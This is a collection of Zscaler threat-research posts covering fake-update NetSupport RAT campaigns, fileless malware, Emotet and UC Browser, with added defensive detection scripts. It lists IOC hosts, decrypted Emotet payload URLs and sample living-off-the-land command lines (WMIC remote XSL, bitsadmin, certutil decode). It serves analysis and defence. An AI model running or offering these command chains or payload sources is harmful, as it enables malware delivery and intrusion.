Security Posts

NetSupport RAT installed via fake update notices

Zscaler Research - 52 min 35 sec ago
Recently, the Zscaler ThreatLabZ team came across two campaigns designed to trick users into downloading a Remote Access Trojan (RAT) via a fake Flash Player update and a fake font update. These campaigns inject malicious redirector scripts into compromised content management system (CMS) sites. These sites run popular CMS software, such as WordPress, Joomla, Drupal, and others, and are being attacked through vulnerabilities introduced by plugins, themes, and extensions, something we've discussed previously on this blog. The two malware campaigns we examine in this blog deliver a payload designed to steal sensitive information.

The following figure depicts the hits on the various compromised sites. Overall, Zscaler has blocked nearly 40,000 of these attempts in the past three months.

Figure 1: The number of hits on the various types of compromised CMS sites: WordPress (green), Joomla (gold), Drupal (blue), and other CMS sites (orange)

Method 1: Fake Flash Player update campaign

In this attack, cybercriminals hacked WordPress sites using a theme plugin vulnerability and injected two malicious redirect scripts into the compromised site. Either script can be used to deploy malware on the user's machine. The injected script redirects to the malware site and downloads the fake update template script, which displays a fake Flash Player update alert to the user over the compromised site.

Figure 2: A compromised WordPress site with the fake Flash Player update page

The following figure shows the source code of the compromised website with the injected scripts.

Figure 3: The injected redirector scripts in a compromised CMS site

The first injected script directs the user to click.clickanalytics208[.]com to download the fake update template. If the visit fails to meet the attacker's checkpoints, such as geolocation and network settings, the next injected script is executed.

Figure 4: The first injected malicious script redirects to the click.clickanalytics208[.]com site

The second injected script redirects to the chrom-update[.]online site and downloads the fake update template script from the malicious site.

Figure 5: The second injected malicious script redirects to the chrom-update[.]online site

The attacker serves the template.js file as a layer over the compromised site with a fake update page. Which fake update page template is displayed depends on the value of a particular variable, called the "banner."

Figure 6: The default template.js code [banner value = 1: browser update; 2: font; 3: Flash]

The fake template page displays an alert to try to trick the user into starting the update. Once the user clicks the "Update" button, the script downloads the malicious HTA file from the specified URL.

Figure 7: A fake Flash Player update page with the link to download the malicious HTA file

If the user clicks the "Later" button, the redirect still occurs, taking the user to the same page to download the malicious HTA file. The following figure depicts the source code of template.js with the link to download the malicious HTA file when the banner value is 3.

Figure 8: The source code of the template.js script from the redirection URL (chrome-update[.]online)

Once the user runs the HTA file, it launches PowerShell via the command prompt and downloads the RAT payload from the specified URL.

Figure 9: The source code of the downloaded malicious HTA file

Figure 10: The obfuscated content responsible for the malware download

Figure 11: The deobfuscated code showing the download link

Figure 12: Step 1 of the malware payload installation process

Figure 13: Step 2 of the malware payload installation process

Figure 14: The NetSupport RAT malware running as a client-side application

Finally, the installed RAT malware sends the victim's information in an encrypted format to the attacker's site (hxxp://179.43.146[.]90/fakeurl.htm) to enable remote access to the victim's machine, as shown in Figure 15 below.

Figure 15: The captured user data is transferred to the attacker's site in an encrypted format

Figure 16: The overall traffic of the fake Flash Player update malware campaign

The attackers were also tracking the visitor count, as shown in Figure 17 below. So far, 113,000 unique users have been affected by this malware attack.

Figure 17: The affected user count

Method 2: Fake font update campaign

In this attack, the cybercriminals inject the fake update template script directly into the legitimate site to evade detection. As mentioned earlier, the template script logic identifies which browser is being used. When accessing the compromised site via Chrome, the user receives an alert that the "PT Sans" font wasn't found.

Figure 18: The compromised site with a fake font update page (Chrome)

The same site accessed via Firefox shows the same alert to the user in the Firefox template.

Figure 19: A compromised site with a fake font update page (Firefox)

The following image shows the source code of the compromised site with the injected template script.

Figure 20: The template.js is injected directly into the compromised site

The source code of the template.js script shows a banner value of "2" and has a link (sreex[.]info/update.exe) to download the malware payload.

Figure 21: The source code of the template.js script with the malware download link

Figure 22: After clicking the update button, the malware payload is downloaded (update.exe)

The following activities were observed while executing the downloaded Trojan.

Figure 23: The program created a process "gdsun.exe" from the malware payload (a self-copy of the payload)

Figure 24: The malware creates a copy of the payload in the %ProgramData%/ folder

Figure 25: It also creates a startup registry entry for the dropped malware

It posts the collected user data to clickies(.)site/CC/index(.)php, which is operated by the attackers.

Figure 26: Post-infection callback traffic

Figure 27: The overall traffic of the fake font update campaign

Conclusion

In today's digital world, a company's website is its most valuable asset. Therefore, it is critically important for companies to protect this public face from an attack that could put their business, employees, and customers at risk. Zscaler has blocked more than 40,000 malicious attacks related to this campaign in the past three months.

Figure 28: The Zscaler Risk Analyzer score for the malware payload download URL

IOCs

URLs:
click.clickanalytics208(.)com
chrom-update(.)online
asasasqwqq(.)xyz
bitbucket(.)org/execuseme1/1312/downloads/download.hta
xyxyxyxyxy(.)xyz/wwwwqwe/11223344.exe
179(.)43(.)146(.)90/fakeurl(.)htm
sygicstyle(.)xyz
sreex(.)info/update(.)exe
clickies(.)site/CC/index(.)php

Malware payload:
5ad69da64dacdf87c5bdea12a20ca8fd4d34e6a16c37dfbb9a2af8df79901504 (download.hta)
9c69a1d81133bc9d87f28856245fbd95bd0853a3cfd92dc3ed485b395e5f1ba0 (11223344.exe)
ea137c0079624de8d2f8b174d44f90faa58c4eda558f7d5db0efa742f36c2cdf (update.exe)
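As an added example (not Zscaler's code), the following Python script looks for the injection pattern described above: script tags in a CMS page whose source, or whose inline body, points at a host other than the site itself or an allowlisted CDN; the HTML sample and the foreign hosts in it are constructed placeholders.

```python
"""Flag <script> tags in a CMS page that load from hosts outside the site.

Added example for this post, not Zscaler's own tooling. It models the
injection described above: a compromised WordPress/Joomla/Drupal page
carries extra <script> tags (or an inline loader stub) that send visitors
to the attacker's fake-update host. The page HTML below is constructed and
the foreign hosts in it are placeholders.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample resembling a compromised WordPress page: two site-local
# scripts, one allowlisted CDN script, one injected external redirector and
# one injected inline loader stub (both pointing at placeholder hosts).
SAMPLE_HTML = """
<html><head>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script src="https://shop.example/wp-content/themes/t/theme.js"></script>
<script src="https://cdn.example.net/lib/slider.min.js"></script>
<script type="text/javascript" src="http://click.attacker-placeholder.test/a.js"></script>
</head><body>
<script>var s=document.createElement('script');s.src='//update-placeholder.test/template.js';document.head.appendChild(s);</script>
<script>wp.i18n.setLocaleData({});</script>
</body></html>
"""

# Absolute or scheme-relative URL inside script text; group 1 is the host.
URL_RE = re.compile(r"(?:https?:)?//([a-z0-9.-]+\.[a-z]{2,})", re.I)


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_inline = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True
            self.inline.append("")

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_inline = False

    def handle_data(self, data):
        if self._in_inline:
            self.inline[-1] += data


def host_of(url):
    """Lower-cased host of an absolute or scheme-relative URL ('' if relative)."""
    if url.startswith("//"):
        url = "https:" + url
    return (urlsplit(url).hostname or "").lower()


def trusted(host, site_host, allowed_hosts):
    """The site itself, its subdomains and an explicit allowlist are trusted."""
    return host == site_host or host.endswith("." + site_host) or host in allowed_hosts


def find_injected_scripts(html, site_host, allowed_hosts=()):
    """Return (kind, value) pairs for scripts that reach out to foreign hosts.

    kind is "external" for a <script src> on a foreign host and "inline" for
    an inline script whose body references a foreign host (a loader stub).
    """
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = host_of(src)
        if host and not trusted(host, site_host, allowed_hosts):
            findings.append(("external", src))
    for body in parser.inline:
        for match in URL_RE.finditer(body):
            if not trusted(match.group(1).lower(), site_host, allowed_hosts):
                findings.append(("inline", match.group(0)))
    return findings


if __name__ == "__main__":
    for kind, value in find_injected_scripts(SAMPLE_HTML, "shop.example", {"cdn.example.net"}):
        print(f"{kind:8} {value}")
```

Run it against a page fetched with curl, or diff its output between a known-good backup and the live site, to catch the redirector pair that Figures 3 to 5 show.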
Categories: Security Posts

Fileless malware campaign roundup

Zscaler Research - 52 min 35 sec ago
Criminals frequently get caught because they leave evidence at the scene of the crime: fingerprints, DNA, and the like. Cybercriminals are no different, often leaving files behind on the systems they infect. In an effort to reduce the evidence left behind after an attack, cybercriminals developed fileless malware, a variant of malicious software that exists exclusively as an artifact in computer memory. In short, the infection does not write any executable files to the infected system's hard drive. By leaving few traces behind, malware authors try to postpone detection by security vendors for as long as possible.

During the past few years, fileless infection has been adopted by numerous forms of malware and advanced persistent threats (APTs). These fileless infection chains can employ multiple techniques to deliver the final payload. In one example, the Kovter Trojan stored its payload in the Windows registry. The Hancitor Trojan wrote its payload into a hollowed process spawned by shellcode that a Word document macro injected into the Microsoft Word process. Lately, we have been seeing an increase in fileless infection techniques that leverage legitimate applications already present on the victim's machine. These techniques do not rely on storing executable files and leave no direct traces on disk, making detection and removal a challenge. In this blog, we will discuss recent malware campaigns that have used fileless infection mechanisms leveraging legitimate applications.

Figure 1: Stats showing hits of fileless infection chains

Case 1: njRat Backdoor

Although njRat has been around for a long time, we recently observed this backdoor being loaded by a fileless infection chain. The victim receives a .docx file as an attachment in a phishing email. Once the .docx file is opened, the infection cycle begins.

Figure 2: The njRat payload loaded by fileless infection

The .docx file's document.xml.rels references a remote OLE object: a Rich Text Format (RTF) document exploiting CVE-2017-0199, which in turn opens an embedded .doc file containing a Visual Basic for Applications (VBA) macro.

Figure 3: The .docx downloading an RTF file

The VBA macro contains an encoded PowerShell script. It downloads a VBScript from "www[.]m9c[.]net/uploads/15676549681.jpg." The VBScript then decodes and executes an embedded PowerShell script, which downloads the encrypted Portable Executable (PE) file from "www[.]m9c[.]net/uploads/15676547971.jpg"; this is the njRat executable.

Figure 4: The PowerShell script in the VBS downloads an encoded PE file

This VBScript decrypts the PE file, a .NET executable, which is loaded directly into memory and runs in the context of MSBuild.exe. No disk write is observed, and the njRat backdoor silently executes under the hood, communicating with the CnC server "borapegar147[.]ddns[.]net".

Case 2: Sodinokibi Ransomware

The Sodinokibi ransomware (also known as REvil) is one of the most well-known ransomware types in the wild today. It has been on the rise since the threat group behind the GandCrab malware operation announced that it had shut down its operations at the end of May. Recently, we have noticed that Sodinokibi has adopted a fileless mechanism.

Figure 5: The Sodinokibi payload loaded by a fileless infection

The fileless infection cycle starts when the victim clicks the BAT file received as an attachment in a phishing email. The BAT file contains a PowerShell script with Base64-encoded expressions.

Figure 6: The BAT file received via MalSpam

As shown below in the decoded PowerShell script, this script downloads another PowerShell script, containing more than 3,000 lines of code and a Base64-encoded portable executable (PE) file, from a pastebin URL and loads it, invoking a function that initiates the attack in the system's memory.

Figure 7: The decoded PowerShell expressions

Figure 8: The encoded PE file in the PowerShell script downloaded from pastebin

This script decodes the PE file and hands it to a loader function, which injects it directly into the system's memory. The loaded PE file, which appears to be a DLL, is actually the Sodinokibi ransomware. We see no traces of the DLL being saved to disk as the ransomware silently starts encrypting files on the system.

Case 3: Astaroth Backdoor

The Astaroth Trojan is known for stealing credentials, keystrokes, and other system information. An analysis of the backdoor and the infection cycle is covered in detail by Microsoft. The infection chain starts with the victim clicking on an LNK file delivered via a phishing email. This LNK file contains an obfuscated WMIC command, which downloads an XSL file containing obfuscated JavaScript.

Figure 9: The obfuscated WMIC command

This JavaScript code downloads a Base64-encoded payload by abusing the Bitsadmin tool and decodes it using the Certutil tool. The payloads are XOR-encrypted PE files, except for one DLL, which is loaded by leveraging the Regsvr32 tool. Finally, this DLL decrypts the Astaroth backdoor payload and maps it into the Windows userinit process.

Figure 10: Obfuscated JavaScript in an XSL file

During the entire attack chain, only system utilities are leveraged to load the final payload. The Astaroth payload executes silently without leaving traces on the filesystem.

The case studies described above are based on techniques that take advantage of legitimate applications, such as PowerShell and Windows Management Instrumentation (WMI). However, there are other techniques in which the payload is stored in the registry and delivered by taking advantage of zero-day vulnerabilities in applications or in the operating systems themselves. In one example, the famous Equifax breach used a vulnerability in Apache Struts to deliver the payload. As the PowerShell scripts were stored in the registry, there was no direct trace of the malware being stored.

Conclusion

Fileless infection campaigns are difficult to detect. That's why the Zscaler ThreatLabZ team continually monitors malware delivery mechanisms from several sources to ensure that Zscaler customers are protected.
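As an added defender-side example that is not part of this post, the following Python hunts process-creation telemetry for the chains described in this post and in the NetSupport RAT post above (WMIC with a remote XSL, bitsadmin and certutil under a script host, regsvr32 loading from a user-writable path, PowerShell handing off to MSBuild, mshta reaching PowerShell via cmd); the events are constructed and the hostnames in them are placeholders.

```python
"""Hunt for living-off-the-land process chains in process-creation telemetry.

Added example, not Zscaler's tooling. It covers the chains in this post
(WMIC fetching a remote XSL, bitsadmin and certutil under a script host,
regsvr32 loading from a user-writable path, PowerShell handing off to
MSBuild) and in the NetSupport RAT post above (mshta launching PowerShell
via cmd). The events are constructed, shaped like simplified Sysmon
process-creation records; hosts in command lines are placeholders.
"""
import re
from collections import namedtuple

Event = namedtuple("Event", "pid ppid image cmdline")

# Constructed telemetry: a macro-style chain (pids 410-430), an Astaroth-style
# LNK chain (500-540), a fake-update HTA chain (600-620) and a benign MSBuild (700).
EVENTS = [
    Event(400, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    Event(410, 400, r"C:\Program Files\Microsoft Office\WINWORD.EXE", "WINWORD.EXE /n invoice.docx"),
    Event(420, 410, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -nop -w hidden -enc QQBCAEMA"),
    Event(430, 420, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", "MSBuild.exe proj.xml"),
    Event(500, 400, r"C:\Windows\System32\cmd.exe", 'cmd.exe /c wmic os get /format:"https://cdn-placeholder.test/v.xsl"'),
    Event(510, 500, r"C:\Windows\System32\wbem\WMIC.exe", 'wmic os get /format:"https://cdn-placeholder.test/v.xsl"'),
    Event(520, 510, r"C:\Windows\System32\bitsadmin.exe",
          r"bitsadmin /transfer j /download https://cdn-placeholder.test/p.b64 C:\Users\Public\p.b64"),
    Event(530, 510, r"C:\Windows\System32\certutil.exe", r"certutil -decode C:\Users\Public\p.b64 C:\Users\Public\p.dll"),
    Event(540, 510, r"C:\Windows\System32\regsvr32.exe", r"regsvr32 /s C:\Users\Public\p.dll"),
    Event(600, 400, r"C:\Windows\System32\mshta.exe", r"mshta.exe C:\Users\u\Downloads\download.hta"),
    Event(610, 600, r"C:\Windows\System32\cmd.exe", "cmd.exe /c powershell -w hidden IEX(...)"),
    Event(620, 610, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell -w hidden IEX(...)"),
    Event(700, 400, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", "MSBuild.exe app.sln"),
]

# (rule name, child image basename, regex over the child's command line or
#  None, set of ancestor basenames of which at least one must be present)
RULES = [
    ("mshta -> PowerShell (fake update HTA)", "powershell.exe", None, {"mshta.exe"}),
    ("Office -> PowerShell (macro)", "powershell.exe", None, {"winword.exe", "excel.exe"}),
    ("PowerShell -> MSBuild (in-memory .NET loader)", "msbuild.exe", None, {"powershell.exe"}),
    ("WMIC with remote XSL stylesheet", "wmic.exe", r'/format:\s*"?https?://', set()),
    ("bitsadmin transfer under a script host", "bitsadmin.exe", r"/transfer|/download",
     {"wmic.exe", "mshta.exe", "wscript.exe", "cscript.exe"}),
    ("certutil used as a decoder", "certutil.exe", r"-decode", set()),
    ("regsvr32 loading from a user-writable path", "regsvr32.exe",
     r"\\users\\public\\|\\appdata\\|\\programdata\\", set()),
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(event, by_pid):
    """Image basenames of the parent chain, nearest parent first."""
    chain, seen = [], set()
    cur = by_pid.get(event.ppid)
    while cur and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(basename(cur.image))
        cur = by_pid.get(cur.ppid)
    return chain


def detect(events):
    """Return (pid, rule name) for every event that matches a rule."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for event in events:
        child = basename(event.image)
        lineage = ancestors(event, by_pid)
        for name, image, pattern, parents in RULES:
            if child != image:
                continue
            if pattern and not re.search(pattern, event.cmdline, re.I):
                continue
            if parents and not parents.intersection(lineage):
                continue
            hits.append((event.pid, name))
    return hits


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(f"pid {pid}: {rule}")
```

The ancestor walk matters more than the child name: the benign MSBuild run launched from explorer (pid 700) is left alone, while the same binary under PowerShell (pid 430) is flagged.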

Emotet is back in action after a short break

Zscaler Research - 52 min 35 sec ago
It's common for cybercriminals to launch an attack, then stop the campaign shortly thereafter before they are detected. These breaks also give the bad actors a chance to change tactics to, once again, attempt to avoid detection. That's what operators using the Emotet malware did, taking a short break before bringing Emotet back in a new, more dangerous form. Emotet operators took about a two-month break: command and control (C&C) servers went down in late May and came back online around the end of August. Then, we began observing a new version of this malware around mid-September.

Emotet started as a banking trojan in 2014. However, it has morphed into a very prominent threat. Now, it is mostly used for spamming and downloading additional malware onto a target system. Based on the unique sample count of malware threats seen by the Zscaler Cloud Sandbox, Emotet and its downloaders appear to be among the most prevalent threats in 2019, followed by banking trojans and loaders, such as TrickBot and Ursnif, remote-access trojans (RATs), and off-the-shelf password stealers, such as LokiBot and AZORult.

Emotet is modular by design: it supports multiple modules for different tasks, such as stealing information, spamming, and more. It is also known to download, and to be downloaded by, other malware families, such as TrickBot and Ursnif. It has also been associated with the Ryuk ransomware.

Email conversation hijacking

This year, Emotet employed a new tactic of using stolen email content in spam campaigns. Hijacking existing email threads can be very effective, as recipients are tricked into believing that the email was sent by the other person in the thread. This trust can lead to the victim opening the email (and attachment) and getting infected with Emotet, effectively making the infected system part of an Emotet botnet.

Figure 1: Emotet activity from the beginning of June 2019 to mid-September 2019.

Figure 2: The new Emotet campaign after the break.

New campaign, new document templates, and new botnets?

We observed the following new templates in spammed malicious documents (maldocs) during this new campaign.

Figures 3 and 4: New macro templates (Product Notice and Protected View)

Earlier, there were two Emotet botnets, known as Epoch 1 (E1) and Epoch 2 (E2), that were using unique RSA keys to communicate with their C&C. After the break, we noticed three new RSA keys in use, which suggests the possibility of a botnet splitting into multiple botnets. The earlier keys were no longer seen in use and the latest three keys are now being used, which means the operators are reorganizing their botnet infrastructure. The already existing RSA keys (RSA1 and RSA2) and the new RSA keys (RSA3, RSA4, and RSA5) are shown in the figure below.

Figure 5: Emotet RSA keys used before and after the break. RSA1 and RSA2 were used before the break.

In this new campaign, we saw Emotet using RSA3, RSA4, and RSA5. (The numbers 1 through 5 are assigned based on the sequence in which the keys were first observed in the wild.) Before the break, the two RSA keys didn't share any C&C infrastructure. In this new campaign, two sub-botnets are sharing some infrastructure (as shown in the following screenshots).

Figure 6: Emotet RSA keys and C&C infrastructure before the break.

Figure 7: RSA keys and C&C infrastructure of the new Emotet campaign.

If we check the overall C&C infrastructure and RSA key relationships before and after the break, we can clearly see a reorganization of the C&C infrastructure, which is now divided among three new Epochs. One Epoch is divided into two, while the other one is used to create a single botnet with some new C&Cs.

Figure 8: The Emotet RSA key and C&C infrastructure relationships before and after the break.

Emotet Downloader payload - Technical analysis

The Emotet infection cycle generally starts with spam emails containing malicious macro documents that drop a JavaScript file. This JavaScript file then downloads the Emotet payload from a compromised WordPress website. Almost all the samples we observed were served from compromised WordPress websites (mostly version 5.2.3). We will take a look at one such malicious document for the purpose of analysis here:

MD5 – 359696113a2156617c28d4f79cc7d44b ("file 20190924 LTR6051.doc")

The macro in the document is quite simple and straightforward but contains lots of junk.

Figure 9: Macro code containing junk instructions.

After removing the junk, this is how the macro code looks.

Figure 10: Cleaned macro code.

It gets its text from TextBox1 in UserForm2, saves that text in a "JS" file, and then executes that file.

Figure 11: A user form containing JavaScript code.

This JavaScript file is heavily obfuscated. More obfuscation is being added to the "JS" code incrementally. In earlier versions of this downloader, some of the strings and function names were readable; now almost every string is obfuscated.

Figure 12: Heavily obfuscated script

This script contains an array of strings in variable "a." First, the elements of the array are shuffled using an anonymous function just after the array definition. Then there is function "b," which is used to decrypt strings and is called extensively throughout the script. Using this function, we can log the decrypted strings just before they are returned. Some of the interesting strings include:

\+\+ *(?:_0x(?:[a-f0-9]){4,6}|(?:\b|\d)[a-z0-9]{1,4}(?:\b|\d))
while (true) {}
return (function() {}.constructor("return this")( )
4|0|7|5|3|1|8|2|6
2|1|0|6|3|5|4
split
debug
error
exception
trace
http://thewomentour.com/wp-includes/f8yezb9/
WScript.Shell
ResponseBody
ActiveXObject
https://www.marquedafrique.com/k9c5qh/eb1wiw8192/
Scripting.FileSystemObject
CreateObject
https://thecrystaltrees.com/nofij3ksa/o5523/
http://4excellent.com/wp-includes/ii950106/
WScript.Shell
Popup
MSXML2.XMLHTTP
GET
open
send
http://www.davidleighlaw.com/wp-content/wlfsj15707/
Position
Open
Type
SaveToFile
random
toString
substr
0|1|3|4|2
11|15|13|4|6|9|8|7|5|0|2|3|1|10|16|14|12
return (function() {}.constructor("return this")( )
7|2|8|0|5|1|4|6|3
2|0|3|4|1
0|14|11|8|3|6|13|9|5|2|1|12|4|10|7
Not Supported File Format
There was an error opening this document. The file is damaged and could not be repaired (for example, it was sent as an email attachment and wasn't correctly decoded).

The script's functionality can be clearly determined from the decrypted strings. It downloads, saves, and runs its payload from a list of URLs and shows the following message box to trick the user into believing the file is corrupt:

Figure 13: An error message to trick a user into believing the file is corrupt.

There are multiple URLs embedded in the script files. The following URLs were extracted from this script:

http://thewomentour[.]com/wp-includes/f8yezb9/
https://www[.]marquedafrique[.]com/k9c5qh/eb1wiw8192/
https://thecrystaltrees[.]com/nofij3ksa/o5523/
http://4excellent[.]com/wp-includes/ii950106/
http://www[.]davidleighlaw[.]com/wp-content/wlfsj15707/

In this case, the Emotet loader is downloaded from "http://thecrystaltrees[.]com/nofij3ksa/o5523/" (MD5 – 402b20268d64acded1c48ce760c76c47). The Emotet loader has already been extensively analyzed and blogged about, so we won't go into the technical details of the loader here. Below are artifacts extracted from this sample.

RSA key extracted from this sample:

-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOzoTryw1r9RxRJPFKalO4+q7JaDZWSB
KZlEc22H6ITuE06tvJspue42TF1yk8xN+1bqW++QeV6Clm1uRswA/qoao/6p4eN0
h4zIO8PEaJ0C/9EO4cx9yfRLlVpjdEkP0QIDAQAB
-----END PUBLIC KEY-----

The sample also embeds a list of C&C server addresses (IP:port pairs).

Conclusion

Emotet is an ever-evolving threat, employing new tricks and tactics. Although it started as a banking trojan, Emotet is now associated with several different malware campaigns, including ransomware and infostealers. The Zscaler ThreatLabZ team proactively tracks and ensures coverage to block downloaders, payloads, and C&C activity from Emotet and other threats. ThreatLabZ is the research division of Zscaler. To learn more about ThreatLabZ and Zscaler cloud activity, visit https://www.zscaler.com/threatlabz/cloud-activity-dashboard
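As an added example (not ThreatLabZ's tooling), the following Python reproduces the key-to-C&C comparison made in this post: it groups loader samples by RSA key label, reports C&C addresses shared between keys, and shows which old key each new key inherits infrastructure from; the sample records, key labels and addresses are constructed (RFC 5737 documentation ranges), not the real Emotet data.

```python
"""Relate Emotet RSA keys (sub-botnets) to the C&C addresses they use.

Added example, not Zscaler's tooling. Each loader sample embeds one RSA
public key and a C&C list; the post groups samples by key (RSA1..RSA5) and
compares the C&C sets before and after the break. The records below are
constructed: placeholder sample names, key labels only, and addresses from
the RFC 5737 documentation ranges.
"""
from collections import defaultdict
from itertools import combinations

# Constructed: (sample name placeholder, RSA key label, phase, C&C list)
SAMPLES = [
    ("sample-a", "RSA1", "before", ["192.0.2.10:8080", "192.0.2.11:443", "192.0.2.12:7080"]),
    ("sample-b", "RSA1", "before", ["192.0.2.10:8080", "192.0.2.13:80"]),
    ("sample-c", "RSA2", "before", ["198.51.100.20:8080", "198.51.100.21:443"]),
    ("sample-d", "RSA3", "after", ["192.0.2.10:8080", "192.0.2.11:443", "203.0.113.30:8080"]),
    ("sample-e", "RSA4", "after", ["192.0.2.12:7080", "192.0.2.13:80", "203.0.113.30:8080"]),
    ("sample-f", "RSA5", "after", ["198.51.100.20:8080", "198.51.100.21:443", "203.0.113.40:443"]),
]


def c2_by_key(samples, phase=None):
    """Union of C&C addresses per RSA key, optionally restricted to one phase."""
    out = defaultdict(set)
    for _, key, sample_phase, c2s in samples:
        if phase is None or sample_phase == phase:
            out[key].update(c2s)
    return dict(out)


def shared_infrastructure(key_sets):
    """C&C addresses that appear under more than one key (shared sub-botnets)."""
    shared = {}
    for k1, k2 in combinations(sorted(key_sets), 2):
        common = key_sets[k1] & key_sets[k2]
        if common:
            shared[(k1, k2)] = common
    return shared


def lineage(before, after):
    """For each new key: how many C&Cs it reuses from each old key, and how many are new."""
    all_old = set().union(*before.values())
    result = {}
    for new_key, c2s in after.items():
        inherited = {old: len(c2s & old_c2s) for old, old_c2s in before.items() if c2s & old_c2s}
        result[new_key] = {"inherited_from": inherited, "new_c2s": len(c2s - all_old)}
    return result


if __name__ == "__main__":
    before = c2_by_key(SAMPLES, "before")
    after = c2_by_key(SAMPLES, "after")
    print("shared before the break:", shared_infrastructure(before))
    print("shared after the break:", shared_infrastructure(after))
    for key, info in lineage(before, after).items():
        print(key, info)
```

With real extractions, feed the function one record per sample (key and C&C list pulled from the loader's configuration) and the lineage output shows directly whether an old Epoch split or was merged into a new one.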

UC Browser app abuses may have exposed 500 million users

Zscaler Research - 52 min 35 sec ago
Recently, when examining the Zscaler cloud for unusual activity, ThreatLabZ researchers found some questionable hits related to a particular domain: 9appsdownloading[.]com. Upon analysis, we found these requests being made from a popular browser that's available on Google Play and has more than 500 million downloads to date: the UC Browser app.

Fig. 1: UC Browser on Google Play

As we began to analyze the UC Browser app, we found that the requests were being made to download an additional Android Package Kit (APK) over an unsecured channel (HTTP instead of HTTPS). Downloading and/or updating components from a third-party source violates Google Play policy, which states: "An app may not download executable code (e.g., dex, JAR, .so files) from a source other than Google Play." We decided to explore the UC Browser app further and found the following issues, which are discussed in detail in this blog:

- Downloading an additional APK from a third party, in violation of Google Play policy
- Communication over an unsecured channel, opening the door to man-in-the-middle attacks
- Dropping an APK on external storage (/storage/emulated/0), allowing other apps with the appropriate permissions to tamper with the APK

We found another app called UC Browser Mini from the same developer with the same functionality and issues; it dropped the same additional APK from a remote server. The screenshot below shows UC Mini on Google Play.

Fig. 2: UC Browser Mini (UC Mini)

It is important to note that these issues have the potential to affect millions of Android users, because the UC Browser app has been downloaded 500 million+ times and UC Mini has been downloaded 100 million+ times. The ThreatLabZ team has been in contact with Google, whose teams are investigating the apps.

Timeline:

August 13, 2019: Zscaler reported the policy violation to Google.
August 13, 2019: Google promptly responded. Case assigned to an investigation team.
August 13 – September 25, 2019: Follow-up emails with research details.
September 27, 2019: Google confirmed the policy violation by UC Browser and UC Mini. Google contacted the UC developers to update the apps and remediate the policy violation.

Update: After Google's intervention, the Zscaler research team noticed that the latest versions of both apps, UC Browser and UC Mini, have stopped downloading the third-party app store.

Technical Details of UC Browser

Name: UC Browser
Package Name: com.UCMobile.intl
Installs: 500,000,000+ (500M+)
Developer: UCWeb Singapore Pte. Ltd.

1. Downloading an APK from a third party

Having identified the UC Browser app as the main culprit, we decided to dig deeper into our analysis of the app. As soon as the app is installed, it displays basic activities (Android screens) to set up the default language, topics of interest, location, and so on.

Fig. 3: UC Browser app icon and initial Android activity

After some initial requests for news and notifications, the app sends multiple requests with redirections and finally drops an APK onto the user's device. The screenshot below illustrates the chain of requests and redirects taking place:

Fig. 4: Unsecured requests for APK download

This functionality of dropping another APK from a third-party source clearly violates Google Play's policy, which includes the following: "An app distributed via Google Play may not modify, replace, or update itself using any method other than Google Play's update mechanism. Likewise, an app may not download executable code (e.g., dex, JAR, .so files) from a source other than Google Play. This restriction does not apply to code that runs in a virtual machine and has limited access to Android APIs (such as JavaScript in a webview or browser)." During our analysis, we found the APK being dropped on external storage, but we did not find the APK being installed. It is possible that this functionality is still under development, or there may be other reasons it wasn't installed, such as an exception, a disabled unknown-sources option, or a rooted device.

2. Communication over an unsecured channel

The APK was downloaded over an unsecured channel (HTTP instead of HTTPS), opening the possibility of man-in-the-middle (MiTM) attacks. In our research, we came across a recent Dr. Web blog post that talks about similar issues they saw with UC Browser downloading and installing libraries from remote servers. In that case, they talk about libraries being downloaded over HTTP; in our case, we saw a completely new APK being dropped (this APK is also analyzed in the latter part of this blog). The consequences of downloading and installing components over unsecured channels were well addressed in the Dr. Web blog, along with the MiTM vulnerability, so we will not address those issues further. We noticed that the app analyzed by Dr. Web researchers had the same icon as our sample, but had a different full name and a different developer. The screenshots below show the Dr. Web sample (left) compared to the Zscaler sample (right):

Fig. 5: UC Browser app samples: Dr. Web (left) and Zscaler (right)

It could be that the same app had been uploaded again on Google Play with a different name and developer, along with modified or enhanced code to download additional APKs.

3. Dropping an APK on external storage

We also noticed that the additional APK dropped by this app is stored on external storage, which is world-readable by default. The screenshot below shows the location of the dropped APK:

Fig. 6: Dropped APK storage location

With the APK placed on external storage, any other app with storage permission (android:name=android.permission.READ/WRITE_EXTERNAL_STORAGE) has access to this location and can tamper with the downloaded APK.

Analysis of the dropped APK

During our analysis, we noted that UC Browser was dropping the APK but not installing it. It is unclear whether this is because the functionality is still under development or there is another reason the APK is not installing. But we did want to find out what the APK contained, so we decided to install it manually and have a look inside. To our surprise, we found that the APK was actually a third-party app store named "9 Apps" with the package name com.mobile.indiapp.

Fig. 7: 9Apps app install process

After installation, the app scans the device for installed apps. The app's scanning and further activities can be seen in the screenshots below:

Fig. 8: 9Apps initial activities

We also saw several adult apps available for download in this third-party app store. These apps can be seen in the screenshot below:

Fig. 9: Adult apps on 9Apps store

We tried downloading a small app from the 9Apps store and, to our surprise, the app was downloaded from 9appsdownloading[.]com. This is the same domain that we mentioned at the beginning of this blog. The screenshot below shows the functionality in action:

Fig. 10: Sample APK download requests

Further scrutiny of Zscaler cloud traffic showed multiple requests for APK downloads from the 9appsdownloading[.]com domain. Within the last month, we found 130+ such requests. The hits can be seen in the Zscaler cloud dashboard:

Fig. 11: Zscaler dashboard showing the domain's activity

Conclusion

